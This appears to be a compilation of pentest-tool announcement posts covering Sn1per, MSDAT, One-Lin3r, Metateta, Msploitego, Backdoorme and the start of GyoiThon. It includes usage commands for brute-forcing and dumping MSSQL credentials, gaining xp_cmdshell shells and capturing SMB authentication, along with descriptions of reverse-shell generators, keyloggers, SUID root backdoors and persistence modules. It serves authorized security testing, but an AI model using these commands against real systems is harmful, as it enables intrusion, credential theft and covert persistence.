Sn1per v5.0 – Automated Pentest Recon Scanner

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.SN1PER PROFESSIONAL FEATURES:Professional reporting interfaceSlideshow for all gathered screenshotsSearchable and sortable DNS, IP and open port databaseCategorized host reportsQuick links to online recon tools and Google hacking queriesPersonalized notes field for each hostDEMO VIDEO:SN1PER COMMUNITY FEATURES: Automatically collects basic recon (ie. whois, ping, DNS, etc.) Automatically launches Google hacking queries against a target domain Automatically enumerates open ports via NMap port scanning Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers Automatically checks for sub-domain hijacking Automatically runs targeted NMap scripts against open ports Automatically runs targeted Metasploit scan and exploit modules Automatically scans all web applications for common vulnerabilities Automatically brute forces ALL open services Automatically test for anonymous FTP access Automatically runs WPScan, Arachni and Nikto for all web services Automatically enumerates NFS shares Automatically test for anonymous LDAP access Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities Automatically enumerate SNMP community strings, services and users Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers Automatically tests for open X11 servers Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds Performs high level enumeration of multiple hosts and subnets Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting Automatically gathers screenshots of all web sites Create individual workspaces to store all scan outputAUTO-PWN:Drupal Drupalgedon2 RCE CVE-2018-7600GPON Router RCE CVE-2018-10561Apache Struts 2 RCE CVE-2017-5638Apache Struts 2 RCE CVE-2017-9805Apache Jakarta RCE CVE-2017-5638Shellshock GNU Bash RCE CVE-2014-6271HeartBleed OpenSSL Detection CVE-2014-0160Default Apache Tomcat Creds CVE-2009-3843MS Windows SMB RCE MS08-067Webmin File Disclosure CVE-2006-3392Anonymous FTP AccessPHPMyAdmin Backdoor RCEPHPMyAdmin Auth BypassJBoss Java De-Serialization RCE’sKALI LINUX INSTALL:./install.shDOCKER INSTALL:Credits: @menzowDocker Install: https://github.com/menzow/sn1per-dockerDocker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/Example usage:$ docker pull menzo/sn1per-docker$ docker run –rm -ti menzo/sn1per-docker sniper menzo.ioUSAGE:[*] NORMAL MODEsniper -t|–target [*] NORMAL MODE + OSINT + RECONsniper -t|–target <TARGET> -o|–osint -re|–recon[*] STEALTH MODE + OSINT + RECONsniper -t|–target <TARGET> -m|–mode stealth -o|–osint -re|–recon[*] DISCOVER MODEsniper -t|–target <CIDR> -m|–mode discover -w|–workspace <WORSPACE_ALIAS>[*] SCAN ONLY SPECIFIC PORTsniper -t|–target <TARGET> -m port -p|–port <portnum>[*] FULLPORTONLY SCAN MODEsniper -t|–target <TARGET> -fp|–fullportonly[*] PORT SCAN MODEsniper -t|–target <TARGET> -m|–mode port -p|–port <PORT_NUM>[*] WEB MODE – PORT 80 + 443 ONLY!sniper -t|–target <TARGET> -m|–mode web[*] HTTP WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttp -p|–port <port>[*] HTTPS WEB PORT MODEsniper -t|–target <TARGET> -m|–mode webporthttps -p|–port <port>[*] ENABLE BRUTEFORCEsniper -t|–target <TARGET> -b|–bruteforce[*] AIRSTRIKE MODEsniper -f|–file /full/path/to/targets.txt -m|–mode airstrike[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLEDsniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace <WORKSPACE_ALIAS>[*] ENABLE LOOT IMPORTING INTO METASPLOITsniper -t|–target <TARGET>[*] LOOT REIMPORT FUNCTIONsniper -w <WORKSPACE_ALIAS> –reimport[*] UPDATE SNIPERsniper -u|–updateMODES:NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.FULLPORTONLY: Performs a full detailed port scan and saves results to XML.WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.UPDATE: Checks for updates and upgrades all components used by sniper.REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.RELOAD: Reload the master workspace report.SAMPLE REPORT:https://gist.github.com/1N3/8214ec2da2c91691bcbcDownload Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/Z_yHqaJ_y1U/sn1per-v50-automated-pentest-recon.html

MSDAT – Microsoft SQL Database Attacking Tool

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.Usage examples of MSDAT:You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the databaseYou have a valid Microsoft SQL account on a database and you want to escalate your privilegesYou have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)Tested on Microsof SQL database 2005, 2008 and 2012.ChangelogVersion 1.0 (2017/02/15) :first version realeasedFeaturesThanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:get technical information (ex: database version) of a MSSQL database without to be authenticatedsearch MSSQL accounts with a dictionnary attacktest each login as password (authentication required)get a windows shell on the database server withxp_cmdshelldownload files remotely with:OLE Automationbulkinsertopenrowsetupload files on the server with:OLE Automationopenrowsetcapture a SMB authentication thanks to:bulkinsertopenrowsetxp_dirtreexp_fileexistxp-getfiledetailssteal MSSQL hashed password, on an any MSSQL versionscan ports through the database:openrowsetexecute SQL requests on a remote MSSQL server trough the database (target) with:bulkinsertopenrowsetlist files/directories with:xp_subdirsxp_dirtreelist drives/medias with:xp_fixeddrivesxp_availablemediacreate folder with:xp_create_subdirInstallationSome dependancies must be installed in order to run MSDAT.In ubuntu:sudo apt-get install freetds-dev or download freetds on http://www.freetds.org/sudo pip install cython colorlog termcolor pymssql argparsesudo pip install argcomplete && sudo activate-global-python-argcompleteAdd “use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf). Example:[global] # TDS protocol version tds version = 8.0 use ntlmv2 = yesExamplesModulesYou can list all modules:./msdat.py -hWhen you have chosen a module (example: all), you can use it and you can list all features and options of the module:./msdat.py all -hYou can know if a specific module can be used on a MSSQL server thanks to the –test-module option. This options is implemented in each mdat module.all moduleThe all module allows you to run all modules (depends on options that you have purchased).python msdat.py all -s $SERVERIf you want:to use your own account file for the dictionnary attacktry multiple passwords for a user without ask youto define your own timeout value./msdat.py all -s $SERVER -p $PORT –accounts-file accounts.txt –login-timeout 10 –force-retryIn each module, you can define the charset to use with the –charset option.mssqlinfo moduleTo get technical information about a remote MSSQL server without to be authenticated:./msdat.py mssqlinfo -s $SERVER -p $PORT –get-max-infoThis module uses TDS protocol and SQL browser Server to get information.passwordguesser moduleThis module allows you to search valid credentials :./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –force-retry –search–force-retry option allows to test multiple passwords for each user without ask youYou can specify your own account file with the –accounts-file option:./msdat.py passwordguesser -s $SERVER -p $PORT –search –accounts-file accounts.txt –force-retrypasswordstealer moduleTo dump hashed passwords :./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –dump –save-to-file test.txtThis modules has been tested on SQL Server 2000, 2005, 2008 and 2014.xpcmdshell moduleTo execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –shellThis previous command give you an interactive shell on the remote database server.If xp_cmdshell is not enabled, the –enable-xpcmdshell can be used in this module to activate it:./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –enable-xpcmdshell –disable-xpcmdshell –disable-xpcmdshell –shellThe –enable-xpcmdshell option enables xp_cmdshell if it is not enabled (not enabled by default).The –disable-xpcmdshell option disables xp_cmdshell if this one is enabled.smbauthcapture moduleThanks to this module, you can capture a SMB authentication:./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –capture $MY_IP_ADDRESS –share-name SHARETo capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of metasploit could be used:msf > use auxiliary/server/capture/smbmsf auxiliary(smb) > exploitThe capture command of this module tries to capture a SMB authentication thanks to xp_dirtree, xp_fileexist or xp-getfiledetails procedure.If you want to choose the SMB authentication procedure to capture the authentication:./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-dirtree-capture 127.0.0.1./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-fileexist-capture 127.0.0.1./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD –xp-getfiledetails-capture 127.0.0.1You can change the SHARE name with the –share-name option.oleautomation moduleThis module can be used to read/write file in the database server.The following command read the file temp.txt stored in the database server:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’To write a string in a file (temp.txt) remotely:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –write-file ‘C:\Users\Administrator\Desktop\temp.txt’ ‘a\nb\nc\nd\ne\nf’This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –get-file ‘C:\Users\Administrator\Desktop\temp.txt’ temp.txtAlso, you can use this module to upload a file (temp.txt) on the target:./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –put-file temp.txt ‘C:\Users\Administrator\Desktop\temp.txtbulkopen moduleThe module bulkopen can be used :to read/download files stored on a database serverto scan ports through the database serverto execute SQL requests on a remote MSSQL server through the databaseTo read a file stored in the target, the following command can be used:./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’"The –method option can be used to specify the method to use:bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) oropenrowset(https://msdn.microsoft.com/en-us/library/ms190312.aspx)):./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –read-file ‘C:\Users\Administrator\Desktop\temp.txt’ –method openrowsetTo download a file (C:\Users\Administrator\Desktop\temp.txt):` “bash ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –get-file ‘C:\Users\Administrator\Desktop\temp.txt’ temp.txtThis module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:“`bash./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –scan-ports 127.0.0.1 1433,1434 -vYou can scan a range of ports:./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –scan-ports 127.0.0.1 1433-1438This module can be used to execute SQL requests (ex: select @@ServerName) on a remote database server (ex: $SERVER2) through the database ($SERVER):./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD ‘select @@ServerName’xpdirectory moduleThe module xpdirectory can be used:to list:filesdirectoriesdrivesto check if a file existsto create a directoryTo list files in a specific directory:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-files ‘C:\’To list directories in a specific directory:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-dir ‘C:\’To list drives:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –list-fixed-drives –list-available-mediaTo check if a file exist:./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –file-exists ‘C:\’ –file-exists ‘file.txt’To create a directory:./msdat.py xpdirectory –s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –create-dir ‘C:\temp’search moduleThe module search can be used to search a pattern in column names of tables and views. Usefull to search the pattern %password% in column names for example.To get column names which contains password patterns (ex: passwd, password, motdepasse, clave):./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –pwd-column-names –show-empty-columnsIf you want to see column names which doesn’t contain a data, you should use the option –show-empty-columns.To search a specific pattern in column names of views and tables:./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE –pwd-column-names –show-empty-columnsDownload MSDAT

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZIGtMzYR_7Q/msdat-microsoft-sql-database-attacking.html

One-Lin3r v1.1 – Gives You One-Liners That Aids In Penetration Testing Operations

One-Lin3r is simple and light-weight framework inspired by the web-delivery module in Metasploit.It consists of various one-liners that aids in penetration testing operations:Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste.Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.Other: Holds liners with the general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc…) on the trending OSes (Windows, Linux, and macOS) “More OSes can be added too".FeaturesSearch for any one-liner in the database by its full name or partially.You can add your own liners by following these steps to create a ".liner" file. Also, you can send it to me directly and it will be added in the framework and credited with your name .Autocomplete any framework command and recommendations in case of typos (in case you love hacking like movies ).Command line arguments can be used to give the framework a resource file to load and execute for automation.The ability to reload the database if you added any liner without restarting the framework.You can add any platform to the payloads database just by making a folder in payloads folder and creating a ".liner" file there.More…The payloads database is not big now because this the first edition but it will get bigger with updates and contributions.ScreenshotsUsageCommandline argumentsusage: one-lin3r [-h] [-r R] [-x X] [-q]optional arguments: -h, –help show this help message and exit -r Execute a resource file (history file). -x Execute a specific command (use ; for multiples). -q Quit mode (no banner).Framework commandsCommand Description——– ————-help/? Show this help menulist/show List payloads you can use in the attack.search Search payloads for a specific oneuse <payload> Use an available payloadinfo <payload> Get information about an available payloadbanner Display bannerreload/refresh Reload the payloads databasecheck Prints the core version and database version then check for them online.history Display command line most important history from the beginningsave_history Save command line history to a fileexit/quit Exit the frameworkInstalling and requirementsTo make the tool work at its best you must have :Python 3.x or 2.x (preferred 3).Linux (Tested on kali rolling), Windows system, mac osx (tested on 10.11)The requirements mentioned in the next few lines.Installing+For windows : (After downloading ZIP and upzip it)python -m pip install ./One-Lin3r-masterone-lin3r -h+For Linux :git clone https://github.com/D4Vinci/One-Lin3r.gitapt-get install libncurses5-devpip install ./One-Lin3rone-lin3r -hUpdating the framework or the databaseOn Linux while outside the directorycd One-Lin3r && git pull && cd ..pip install ./One-Lin3r –upgradeOn Windows if you don’t have git installed, redownload the framework zipped!Download One-Lin3r

Link: http://feedproxy.google.com/~r/PentestTools/~3/elxDfxPSrg8/one-lin3r-v11-gives-you-one-liners-that.html

Metateta – Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit

Metateta Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit For faster pen testing for large networksWhat You Can DoScanning with all metasploit modules for specific network Protocol like smb,smtp,snmpRun all Auxiliary modules against specific network ProtocolRun all Possible Metasploit Exploits for specific network Protocol That’s is not recommended for real pen testingCan Run against one target or network or even text file with targetsUsing example’srun.py -R 192.168.1.15-255 -p smb -x exploit run.py -r 192.168.1.15 -p smtp -x scan run.py -f hosts.txt -p smb -x auxiliaryHossam Mohamed – @wazehellDownload Metateta

Link: http://feedproxy.google.com/~r/PentestTools/~3/JS2U_1rLV1I/metateta-automated-tool-for-scanning.html

Msploitego – Pentesting Suite For Maltego Based On Data In A Metasploit Database

msploitego leverages the data gathered in a Metasploit database by enumerating and creating specific entities for services. Services like samba, smtp, snmp, http have transforms to enumerate even further. Entities can either be loaded from a Metasploit XML file or taken directly from the Postgres msf database.RequirementsPython 2.7Has only been tested on Kali Linuxsoftware installations:Metasploitnmapenum4linuxsmtp-checkniktoInstallationcheckout and update the transform path inside MaltegoIn Maltego import config from msploitego/src/msploitego/resources/maltego/msploitego.mtzGeneral UseUsing exported Metasploit xml filerun a db_nmap scan in metatasploit, or import a previous scanmsf> db_nmap -vvvv -T5 -A -sS -ST -Pnmsf> db_import /path/to/your/nmapfile.xmlexport the database to an xml filemsf> db_export -f xml /path/to/your/output.xmlIn Maltego drag a MetasploitDBXML entity onto the graph.Update the entity with the path to your metasploit database file.run the MetasploitDB transform to enumerate hosts.from there several transforms are available to enumerate services, vulnerabilities stored in the metasploit DBUsing Postgresdrag and drop a Postgresql DB entity onto the canvas, enter DB details.run the Postgresql transforms directly against a running DBNotesInstead of running a nikto scan directly from Maltego, I’ve opted to include a field to for a Nikto XML file. Nikto can take long time to run so best to manage that directly from the os.ScreenshotsTODO’sConnect directly to the postgres database – in progressMuch, much, much more tranforms for actions on generated entities.Download Msploitego

Link: http://feedproxy.google.com/~r/PentestTools/~3/NL3Bxk8kM2s/msploitego-pentesting-suite-for-maltego.html

Backdoorme – Powerful Auto-Backdooring Utility

Tools like metasploit are great for exploiting computers, but what happens after you’ve gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time.Once an SSH connection has been established with the target, Backdoorme’s strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access – only keep that access once it has been gained.Please only use Backdoorme with explicit permission – please don’t hack without asking.UsageBackdoorme is split into two parts: backdoors and modules.Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety.Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence.SetupTo start backdoorme, first ensure that you have the required dependencies.For Python 3.5+:$ sudo apt-get install python3 python3-pip python3-tk nmap $ cd backdoorme/$ virtualenv –python=python3.5 env$ source env/bin/activate(env) $ pip install -r requirements.txtFor Python 2.7:$ sudo python dependencies.pyGetting StartedLaunching backdoorme:$ python master.pyTo add a target:>> addtargetTarget Hostname: 10.1.0.2Username: victimPassword: password123 + Target 1 Set!>>BackdoorsTo use a backdoor, simply run the “use" keyword.>> use shell/metasploit + Using current target 1. + Using Metasploit backdoor…(msf) >>From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.(msf) >> show optionsBackdoor options:Option Value Description Required—— —– ———– ——–name initd name of the backdoor False…(msf) >> set name apache + name => apache(msf) >> show optionsBackdoor options:Option Value Description Required—— —– ———– ——–name apache name of the backdoor False…As in metasploit, backdoors are organized by category.Auxiliarykeylogger – Adds a keylogger to the system and gives the option to email results back to you.simplehttp – installs python’s SimpleHTTP server on the client.user – adds a new user to the target.web – installs an Apache Server on the client.Escalationsetuid – the SetUID backdoor works by setting the setuid bit on a binary while the user has root acccess, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root. (‘nano /etc/shadow’). Note that root access is initially required to deploy this escalation backdoor.shell – the shell backdoor is a privilege escalation backdoor, similar to (but more specific than) it’s SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unprivileged user, simply run ".bash -p", and you will have root access.Shellbash – uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.bash2 – a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.sh – Similar to the first bash backdoor, but redirects input to /bin/sh.sh2 – Similar to the second bash backdoor, but redirects input to /bin/sh.metasploit – employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.java – creates a socket connection using libraries from Java and compiles the backdoor on the target.ruby – uses ruby’s libraries to create a connection, then redirects to /bin/bash.netcat – uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.netcat_traditional – utilizes netcat-traditional’s -e option to create a reverse shell.perl – a script written in perl which redirects output to bash, and renames the process to look less conspicuous.php – runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web modulepython – uses a short python script to perform commands and send output back to the user.web – ships a web server to the target, then uploads msfvenom’s php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.Accessremove_ssh – removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces.ssh_key – creates RSA key and copies to target for a passwordless ssh connection.ssh_port – Adds a new port for ssh.Windowswindows – Uses msfvenom to create a windows backdoor.ModulesEvery backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.(msf) >> add poison + Poison module addedEach module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.(msf) >> help…Poison module options:Option Value Description Required—— —– ———– ——–name ls name of command to poison Falselocation /bin where to put poisoned files into FalseCurrently enabled modules include:PoisonPerforms bin poisoning on the target computer – it compiles an executable to call a system utility and an existing backdoor.For example, if the bin poisoning module is triggered with "ls", it would would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tripping a user to run an existing backdoor more frequently.CronAdds an existing backdoor to the root user’s crontab to run with a given frequency.WebSets up a web server and places a web page which triggers the backdoor.Simply visit the site with your listener open and the backdoor will begin.UserAdds a new user to the target.StartupAllows for backdoors to be spawned with the bashrc and init files.WhitelistWhitelists an IP so that only that IP can connect to the backdoor.TargetsBackdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.Download Backdoorme

Link: http://feedproxy.google.com/~r/PentestTools/~3/tBsAiuIMyWY/backdoorme-powerful-auto-backdooring.html

GyoiThon – A Growing Penetration Test Tool Using Machine Learning

GyoiThon is a growing penetration test tool using Machine Learning.GyoiThon identifies the software installed on web server (OS, Middleware, Framework, CMS, etc…) based on the learning data. After that, it executes valid exploits for the identified software using Metasploit. Finally, it generates reports of scan results. GyoiThon executes the above processing automatically.Processing steps GyoiThon executes the above “Step1" – "Step4" fully automatically.User’s only operation is to input the top URL of the target web server in GyoiThon.It is very easy!You can identify vulnerabilities of the web servers without taking time and effort.Processing flowStep 1. Gather HTTP responses.GyoiThon gathers several HTTP responses of target website while crawling.The following are example of HTTP responses gathered by GyoiThon.Example.1HTTP/1.1 200 OKDate: Tue, 06 Mar 2018 03:01:57 GMTConnection: closeContent-Type: text/html; charset=UTF-8Etag: "409ed-183-53c5f732641c0"Content-Length: 15271…snip…Example.2HTTP/1.1 200 OKDate: Tue, 06 Mar 2018 06:56:17 GMTConnection: closeContent-Type: text/html; charset=UTF-8Set-Cookie: f00e68432b68050dee9abe33c389831e=0eba9cd0f75ca0912b4849777677f587;path=/;Content-Length: 37496…snip…Example.3HTTP/1.1 200 OKDate: Tue, 06 Mar 2018 04:19:19 GMTConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 11819…snip…